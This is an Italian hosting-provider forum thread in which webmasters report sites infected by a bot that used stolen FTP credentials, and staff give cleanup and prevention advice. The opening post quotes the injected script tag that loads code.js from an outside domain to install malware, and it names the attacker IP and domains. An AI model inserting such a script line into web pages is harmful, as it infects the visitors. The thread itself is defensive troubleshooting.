Visualizzazione risultati 1 fino 28 di 28
Like Tree2Likes
  • 1 Post By isolagru
  • 1 Post By platinumleaguefc

Discussione: Malware su sito, come evitarlo

  1. #1
    Data registrazione
    21-02-2007
    Messaggi
    21

    Exclamation Malware su sito, come evitarlo

    Salve a tutti!

    Oggi alcuni utenti del forum di Nonciclopedia ci hanno segnalato un malware.
    Purtroppo la cosa non mi è suonata nuova, perché in questi giorni ho riscontrato personalmente lo stesso problema su alcuni siti con un altro hosting.
    Ma a quanto pare il problema è molto diffuso (basta guardare le segnalazioni recenti che avete avuto qui stesso: 1, 2, 3, 4, 5, ecc ecc)
    Mentre su google si trova ancora poca roba, per lo più altri siti infetti ed una ragazza (vostra utente, pare) che si lamenta sul forum di phpBB.

    Intanto vorrei sapere dove poter controllare gli accessi ftp o quelli al pannello di controllo... spero che non li forniate solo se richiesti dalla Polpost. (scusate la frecciatina, ma non avendo mai ricevuto risposta su questo argomento, era dovuta. Comunque ormai non serve più una risposta, l'abbiamo scoperto da soli.)
    Poi capire anche se è la stessa cosa (o simile) che sta succedendo agli altri utenti.
    Ed infine capire COME hanno fatto ad accedere a siti diversi, con hosting diversi e cms diversi (o anche nessun cms).

    Nei siti che ho potuto controllare l'IP 95.211.43.6 era sempre lo stesso, per esempio:
    Mon Apr 02 01:51:20 2012 0 95.211.43.6
    Mon Apr 02 01:51:21 2012 0 95.211.43.6
    Mon Apr 02 01:51:23 2012 1 95.211.43.6
    Mon Apr 02 01:51:25 2012 0 95.211.43.6
    Mon Apr 02 01:51:26 2012 0 95.211.43.6

    ...e come potete notare le modifiche fatte sono consecutive nell'arco di pochi secondi, quindi sarà stato usato un bot.

    Le modifiche fatte sono più o meno sempre le stesse:
    1) sono stati modificati tutti i php ed html (qualche volta anche txt) nelle sole cartelle di root
    2) la modifica consiste nell'inserimento della riga
    Codice:
    <script type="text/javascript" src="http://unitedsquashleague.com/players/code.js"></script>
    Il risultato è l'avvio di Java e seguente installazione di malware nel sistema operativo, consiglio quindi a tutti, per precauzione, di disabilitare i plugin Java... almeno per adesso.

    Quindi sono andato nella root, ho ripulito dalla riga i file modificati di recente ed è tornato tutto normale.



    Facendo un po' di "indagini", l'IP è Olandese e della Leaseweb. Quindi l'attacco potrebbe provenire da un server-zombie. Ma non solo:
    1) UnitedSquashLeague.com a quanto pare è un vecchio dominio e quindi forse è un'altra vittima... in quel code.js (che tra l'altro nel sito non compare da nessuna parte, sembra pulito... forse l'hanno usato solo come redirect) c'è un iframe richiama invece un altro sito, helpindowns.in, un sito fantasma che è stato registrato abbastanza di recente per la prima volta in assoluto, e sarà il colpevole perché se guardate tra i dati del Registrant si nota che sono farlocchi (città "NewYourk", tel +1.1231231, ecc)
    2) questo helpindowns usa afraid.org come DNS, un sito che offre DNS gratis, quindi penso non abbia manco l'hosting ma solo il dominio. Sempre dal whois si vede che il server ha un ip generico 188.72.194.251 che andando a controllare, in fondo, dice che appartiene a Leaseweb Germany... qui il collegamento con l'IP colpevole. Tra l'altro nel campo "Reverse IP:" dice <<3 websites use this address. (examples: helpindowns.in helpindownx.in helpindownz.in) >>, magari sono altri siti-fantoccio.
    3) Nel whois dell'ip 188.72.194.251 c'è anche un riferimento ad un hostmaniac.com (whois) che per essere un hosting non ha sito, quindi sarà un altro fantoccio, registrato da un certo Anton Sogreev... un russo, guarda un po'.


    Ora, al di là della semplice pulizia, come bisogna comportarsi?
    Segnalare ad unitedsquashleague.com che hanno quel js infetto?
    Segnalare a Leaseweb l'IP e i vari hosting fantoccio?
    Che altro?

    (...forse se pinnate il topic evitate agli altri di aprirne di nuovi)

  2. #2
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    Ed infine capire COME hanno fatto ad accedere a siti diversi, con hosting diversi e cms diversi (o anche nessun cms).
    Gran parte dei virus/malware di ultima generazione, una volta compromesso il proprio pc, colleziona eventuali credenziali di accesso dai client FTP installati o dalle mailbox in uso, poi utilizzate da bot per caricare il malware nei rispettivi spazi web.
    Questo spiega perché il fenomeno si manifesta indistintamente su differenti account su differenti hosting e differenti CMS, così come la sua diffusione.

    Qui un articolo che illustra ad esempio il funzionamento di koobface (particolarmente interessante la sezione "to webmasters"): http://blog.unmaskparasites.com/2010...b-of-koobface/

    Ora, al di là della semplice pulizia, come bisogna comportarsi?
    Segnalare ad unitedsquashleague.com che hanno quel js infetto?
    Segnalare a Leaseweb l'IP e i vari hosting fantoccio?
    Che altro?
    1) Segnalare alle entità coinvolte è sicuramente utile
    2) Mantenere il pc pulito
    3) Evitare di salvare le proprie credenziali
    4) Evitare di accedere con le proprie credenziali da terminali pubblici/condivisi
    5) Cambiare spesso password, dal momento che passa del tempo da quando le credenziali sono trafugate dal pc infetto al momento in cui sono usate
    Ultima modifica di Gianluca : 09-04-2012 alle ore 00.52.22
    Gianluca

  3. #3
    isolagru non è connesso Neofita
    Data registrazione
    25-03-2012
    Messaggi
    9

    Predefinito

    Citazione Originalmente inviato da Gianluca Visualizza messaggio
    Gran parte dei virus/malware di ultima generazione, una volta compromesso il proprio pc, colleziona eventuali credenziali di accesso dai client FTP installati o dalle mailbox in uso, poi utilizzate da bot per caricare il malware nei rispettivi spazi web.
    Questo spiega perché il fenomeno si manifesta indistintamente su differenti account su differenti hosting e differenti CMS, così come la sua diffusione.

    Qui un articolo che illustra ad esempio il funzionamento di koobface (particolarmente interessante la sezione "to webmasters"): http://blog.unmaskparasites.com/2010...b-of-koobface/



    1) Segnalare alle entità coinvolte è sicuramente utile
    2) Mantenere il pc pulito
    3) Evitare di salvare le proprie credenziali
    4) Evitare di accedere con le proprie credenziali da terminali pubblici/condivisi
    5) Cambiare spesso password, dal momento che passa del tempo da quando le credenziali sono trafugate dal pc infetto al momento in cui sono usate
    Alla Cortese Attenzione del Sig. Gianluca,
    Sono il gestore responsabile del dominio "isolandia.it" (sottodominio AV isolagru.altervista.org), e sono stato anche io VITTIMA di questo virus/malware... Nonostante ho seguito la procedura da Voi indicata via Email per riaccedere al mio account, quest'ultimo è ancora COMPLETAMENTE bloccato!!
    Non capisco per quale motivo in quanto Voi a conoscenza del virus e del file infetto non avete agito in modo da cancellarlo in modo definitivo invece di bloccare completamente l'attività dei vostri utenti oscurando completamente i siti VITTIME di questo attacco... Avete, nel tentativo di proteggerli, causato dei danni morali e (in alcuni casi) economici alle attività dei vostri utenti bloccandogli completamente qualsiasi canale di comunicazione e non dandogli la possibilità di riparare il danno cancellando anche manualmente il file virus/malware, causa di questo problema...
    Vi chiedo cortesemente di sbloccare il mio account il prima possibile, ringrazio per la cortese attenzione!!
    maxbardella likes this.

  4. #4
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    isolagru:

    Se hai seguito le istruzioni e ripulito lo spazio web dal materiale infetto il traffico sarà sbloccato, e se non fosse così in tempi brevi puoi contattare l'abuse: http://it.altervista.org/contatti.php, comunque accertati di aver fatto tutto, perché nel tuo spazio web risulta ancora esserci materiale infetto.

    AlterVista si limita a tutelare sia il webmaster, ma anche il visitatore, impedendo l'accesso a materiale infetto, nulla da eccepire sul fatto che il webmaster sia una vittima in questo caso, ma appunto per evitare che le vittime aumentino e l'infezione cresca è appunto necessario bloccare l'accesso al sito.

    Non è infine mestiere di AlterVista andare a modificare quanto contenuto nello spazio web di sua iniziativa, cancellare o modificare files, il compito è del webmaster, che è responsabile dei contenuti che consciamente o meno immette in rete.
    Ultima modifica di Gianluca : 14-06-2012 alle ore 14.32.59
    Gianluca

  5. #5
    isolagru non è connesso Neofita
    Data registrazione
    25-03-2012
    Messaggi
    9

    Predefinito

    Citazione Originalmente inviato da Gianluca Visualizza messaggio
    isolagru:
    Se hai seguito le istruzioni e ripulito lo spazio web dal materiale infetto il traffico sarà sbloccato, e se non fosse così in tempi brevi puoi contattare l'abuse: http://it.altervista.org/contatti.php, comunque accertati di aver fatto tutto, perché nel tuo spazio web risulta ancora esserci materiale infetto.
    Sig. Gianluca, NON ci è possibile cancellare il file infetto in quanto :
    Su FTP mi risponde:

    Errore Grave
    Sul nostro CP (Pannello di Controllo) mi risponde:

    Non riesco ad accedere ai tuoi files, può essere un problema transitorio dovuto ad un aggiornamento o guasto, in questo caso se il fatto persiste per oltre 2 ore consecutive inoltra una segnalazione nel forum.
    Citazione Originalmente inviato da Gianluca Visualizza messaggio
    AlterVista si limita a tutelare sia il webmaster, ma anche il visitatore, impedendo l'accesso a materiale infetto, nulla da eccepire sul fatto che il webmaster sia una vittima in questo caso, ma appunto per evitare che le vittime aumentino e l'infezione cresca è appunto necessario bloccare l'accesso al sito.
    Non vorrei essere polemico, però non c'era una metodo meno drastico per bloccare la diffusione del virus/malware come ad esempio bloccare i permessi (mettendoli a 000) del/dei file/files infetto/i??

    Citazione Originalmente inviato da Gianluca Visualizza messaggio
    Non è infine mestiere di AlterVista andare a modificare quanto contenuto nello spazio web di sua iniziativa, cancellare o modificare files, il compito è del webmaster, che è responsabile dei contenuti che consciamente o meno immette in rete.

  6. #6
    L'avatar di dreadnaut
    dreadnaut non è connesso Super Moderatore
    Data registrazione
    22-02-2004
    Messaggi
    5,886

    Predefinito

    Citazione Originalmente inviato da isolagru Visualizza messaggio
    Non vorrei essere polemico, però non c'era una metodo meno drastico per bloccare la diffusione del virus/malware come ad esempio bloccare i permessi (mettendoli a 000) del/dei file/files infetto/i??
    Questo purtroppo non è possibile: spesso non c'è un singolo "file infetto", ma pezzi di codice malevolo inseriti all'interno dei normali script del sito.

    Bloccare con i permessi come suggerisci eviterebbe l'infezione, si, ma lascerebbe gli script che compongono il sito in uno stato "rotto" ma ancora funzionante che potrebbe provocare seri danni ai dati dell'utente.
    chezDreadnaut
    "Un <BR/> è impuro, punto."
    "I <P>&nbsp;</P> non hanno diritto di esistere."

  7. #7
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    isolagru:

    Scrivi all'Abuse come ti ho suggerito
    Gianluca

  8. #8
    isolagru non è connesso Neofita
    Data registrazione
    25-03-2012
    Messaggi
    9

    Angry

    Citazione Originalmente inviato da dreadnaut Visualizza messaggio
    Questo purtroppo non è possibile: spesso non c'è un singolo "file infetto", ma pezzi di codice malevolo inseriti all'interno dei normali script del sito.

    Bloccare con i permessi come suggerisci eviterebbe l'infezione, si, ma lascerebbe gli script che compongono il sito in uno stato "rotto" ma ancora funzionante che potrebbe provocare seri danni ai dati dell'utente.
    La ringrazio per la sua spiegazione precisa sul motivo... purtroppo nonostante ho seguito la procedura indicata da AV 2 o 3 giorni fa, riesco ad accedere al mio account, però non ai miei files......

    Citazione Originalmente inviato da Gianluca Visualizza messaggio
    isolagru:

    Scrivi all'Abuse come ti ho suggerito
    L'avevo già fatto, però l'abuse mi manda solo dei link al forum dove ci sono solo suggerimenti...
    "Cambiare spesso la password"
    "Non memorizzare la password"
    ...ecc, ecc...

    Non vengo in alcun modo aiutato per recuperare i miei files...
    Ultima modifica di isolagru : 15-06-2012 alle ore 14.35.14

  9. #9
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    isolagru:

    Non risulta nessuna tua mail all'Abuse, scrivi all'indirizzo che trovi nella pagina che ti ho linkato
    Gianluca

  10. #10
    isolagru non è connesso Neofita
    Data registrazione
    25-03-2012
    Messaggi
    9

    Predefinito

    Citazione Originalmente inviato da Gianluca Visualizza messaggio
    isolagru:

    Non risulta nessuna tua mail all'Abuse, scrivi all'indirizzo che trovi nella pagina che ti ho linkato
    Adesso ho tolto TUTTO ciò che non mi risultava che aver messo io sul sito, attendo che sblocchiate il mio account. Grazie. Distinti Saluti.

  11. #11
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    isolagru:

    Il tuo sito è appunto accessibile
    Gianluca

  12. #12
    Data registrazione
    26-08-2010
    Messaggi
    4

    Exclamation Impossibile rimuovere un malware

    Buongiorno,
    ho deciso di rivolgermi a qualcuno qui perché non so più cosa fare...
    è dal 28/03 circa che miei utenti mi segnalano l'attacco di un malware sul nostro sito, ma solo su due cartelle specifiche (altre che contengono gli stessi file non risultano avere problemi).

    Premesso che ho provato a:
    1) eliminare dal file infetto il codice malware
    2) sostituire i file segnalati come infetti con copia sana
    3) sovrascrivere le sottocartella dove veniva segnalato l file infetto con copia sana
    4) sovrascrivere tutte le cartelle infette con copia sana
    5) cancellare completamente e ricaricare le cartelle infette

    Premesso che i file che carico dal mio computer sono affidabili al 100% (effettuate scansioni complete, cancellazioni cache e quant'altro possibile)

    A oggi continua a ripresentarsi il problema.
    Come posso fare? Qualcuno è in grado di darmi una mano?

    Ringrazio anticipatamente per l'attenzione
    maxbardella likes this.

  13. #13
    L'avatar di alemoppo
    alemoppo non è connesso Super Moderatore
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    7,536

    Predefinito

    Dovresti eseguire questi punti:

    Citazione Originalmente inviato da Gianluca Visualizza messaggio
    1) Segnalare alle entità coinvolte è sicuramente utile
    2) Mantenere il pc pulito
    3) Evitare di salvare le proprie credenziali
    4) Evitare di accedere con le proprie credenziali da terminali pubblici/condivisi
    5) Cambiare spesso password, dal momento che passa del tempo da quando le credenziali sono trafugate dal pc infetto al momento in cui sono usate
    In particolare, prima di sostituire i file corrotti con quelli affidabili, dovresti prima cambiare password sul tuo account altervista.

    p.s: non riesumare le vecchie discussioni!

    Ciao!
    SE MI SCRIVI IN PRIVATO PER QUESTIONI TECNICHE NON RISPONDO: C'È IL FORUM!

  14. #14
    quizzical non è connesso Neofita
    Data registrazione
    13-08-2008
    Messaggi
    28

    Predefinito

    Ho avuto una esperienza del genere da un giorno all'altro mi sono ritrovato dei malware tra i miei file.

    All'inizio non capivo come poteva essere successo, non avevo script vulnerabili (ad esempio il classico upload di file scritto male) ma un CMS aggiornato all'ultima versione e assai rinomato.

    Alla fine ho scoperto che la causa era il servizio hosting condiviso che usavo allora che era configurato male e permetteva a utenti malintenzionati di accedere alla mia root directory.
    Qui su altervista invece non mi è successo e dopo 10 anni sono abbastanza sicuro non succederà
    È meglio avere i pantaloni rotti nel sedere che il sedere rotto nei pantaloni. Free hosting

  15. #15
    programsdexstex non è connesso Neofita
    Data registrazione
    12-01-2010
    Messaggi
    1

    Predefinito

    Non riesco ad accedere ai tuoi files, può essere un problema transitorio dovuto ad un aggiornamento o guasto, in questo caso se il fatto persiste per oltre 2 ore consecutive inoltra una segnalazione nel forum.Possibile che dopotutto un utente a cancellato tutto dal suo sever l'account da 1 mese non mi viene riprestinato dopo tutto che ho pagato lo spazio sever mi puzza di truffa...........

  16. #16
    asel non è connesso Neofita
    Data registrazione
    12-02-2012
    Messaggi
    1

    Predefinito

    sito asel.altervista.org Nonostante ho seguito la procedura da Voi indicata via Email per riaccedere al mio account, quest'ultimo è ancora COMPLETAMENTE bloccato!! come possiamo risolvere ?

  17. #17
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    Hai contattato l'abuse come scritto sopra? http://it.altervista.org/contatti.php#abuse
    Gianluca

  18. #18
    effettolunatico non è connesso Utente AlterBlog
    Data registrazione
    21-06-2010
    Messaggi
    14

    Predefinito

    Ragazzi scusate se mi intrometto in questa discussione (non mi sembrava il caso di aprirne un'altra sullo stesso argomento) ma io da qualche giorno ho problemoni con degli iframe Un malwere che qualcuno mi installa nel codice html del mio forum che ovviamente fanno risultare, agli occhi di google, il sito come malevolo. Con qualsiasi browser provo ad accedere mi esce il messaggio che il sito potrebbe arrecare danni al pc ho sempre e puntualmente rimosso gli iframe in questione ma tempo 24 ore scarse e me li ritrovo di nuovo....ho aggiornato il forum ad una versione successiva ricaricando tutti i file da ftp ma il problema resta lo stesso.... l'accesso al sito ed al pannello di controllo di altervista non è intaccato è tutto regolare ogni volta che cancello l'iframe comunque cambio sia la password di amministratore sia la password di altervista ma il problema si ripresenta puntuale il giorno dopo....qualcuno sa come risolvere questa grana? ho scritto all'abuse ma non ho ottenuto risposta spero che qualcuno di voi ne sappia più di me... grazie a quanti riusciranno a capirci qualcosa....

  19. #19
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    effettolunatico:

    l'Abuse non ti può ovviamente aiutare a risolvere questo problema, come potrebbe?
    Probabilmente l'aggiornamento del forum non è sufficiente, dovresti verificare se hai nel tuo spazio web qualche shell php, magari introdotta sfruttando qualche problema della precedente versione.
    Gianluca

  20. #20
    effettolunatico non è connesso Utente AlterBlog
    Data registrazione
    21-06-2010
    Messaggi
    14

    Predefinito

    Ciao Gianluca e grazie per la risposta ma una domanda mi sorge spontanea come faccio a trovare questa ipotetica shell?
    A parte questo avevo pensato di cancellare tutti ma proprio tutti i file presenti nel mio spazio per poi reinstallare una versione pulita del forum, anche se l'avviso me lo da soltanto per le pagine del forum attivo...se entro in qualsiasi altro link caricato sul mio spazio non compare nessun avviso, tu dici che sia possibile poi utilizzare il database già esistente? Cioè man mano che installerò le mod e le varie modifiche e plugin che avevo nel forum attivo funzioneranno anche in quello che avrò reinstallato oppure perderò tutto?
    Per farla breve... è possibile utilizzare un database già esistente per un forum nuovo di zecca? Grazie per un'eventuale risposta!

  21. #21
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    effettolunarico:

    se la versione del forum che andrai a ricaricare sarà la stessa suppongo di sì. Non è escluso che il problema possa annidarsi nel database stesso, ma certamente eliminare tutto e ricaricare qualcosa di pulito è certamente un primo passo.
    Gianluca

  22. #22
    smartphoneitaly non è connesso Neofita
    Data registrazione
    14-02-2013
    Messaggi
    5

    Predefinito

    ciao, stamattina hjo avuto anche io la segnalazione da parte di google di un malware. per ora sembra solo per il forum e non per il blog. la soluzione quindi è reistallare il forum? come si può evitare di incappare nei malware?

  23. #23
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    Queste sono le linee guida generali: Malware su sito, come evitarlo , a cui va aggiunto il mantenere aggiornati i propri applicativi
    Gianluca

  24. #24
    smartphoneitaly non è connesso Neofita
    Data registrazione
    14-02-2013
    Messaggi
    5

    Predefinito

    Citazione Originalmente inviato da Gianluca Visualizza messaggio
    Queste sono le linee guida generali: Malware su sito, come evitarlo , a cui va aggiunto il mantenere aggiornati i propri applicativi
    E quindi?? a cosa mi serve questo per capire come pulire sto cavolo di sito??? E' mai possibile che altervista non disponga di un antivirus o uno strumento di diagnostica per i domini che ospita??? assurdo!

  25. #25
    L'avatar di Gianluca
    Gianluca non è connesso Amministratore
    Data registrazione
    15-02-2001
    Messaggi
    17,990

    Predefinito

    smartphoneitaly:

    AlterVista dispone di una serie di strumenti per rilevare fenomeni simili e notificarne ai diretti interessati la presenza, fermo restando che non in ogni caso possono essere rilevati e non è compito di AlterVista farlo.

    Ovviamente non può fare la scansione del tuo pc e occuparsi di aggiornare o anche solo analizzare ogni eventuale applicativo che decidi di installare nel tuo spazio web.

    Premesso questo visto che è Google che ti ha segnalato il malware (sia esso reale o falso positivo) sarà Google in grado di darti le informazioni in merito, e le dovresti trovare nei webmaster tools che ti mette a disposizione.
    Gianluca

  26. #26
    andrlisa non è connesso Neofita
    Data registrazione
    25-05-2015
    Messaggi
    2

    Predefinito

    Mi entrano dei virus nel sito come eliminarli ho installato l' antivirus ma il problema si ripete

  27. #27
    andrlisa non è connesso Neofita
    Data registrazione
    25-05-2015
    Messaggi
    2

    Predefinito

    Premetto che ho un dispositivo mobile

  28. #28
    karl94 non è connesso Staff AV
    Data registrazione
    03-10-2005
    Messaggi
    17,104

    Predefinito

    Andrlisa: non riesumare una discussione vecchia più di un anno. Sul tuo sito non noto alcuna traccia di materiale dannoso o malevolo. Apri una nuova discussione spiegando esattamente qual è il problema e riportando eventuali messaggi di errore che visualizzi.

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •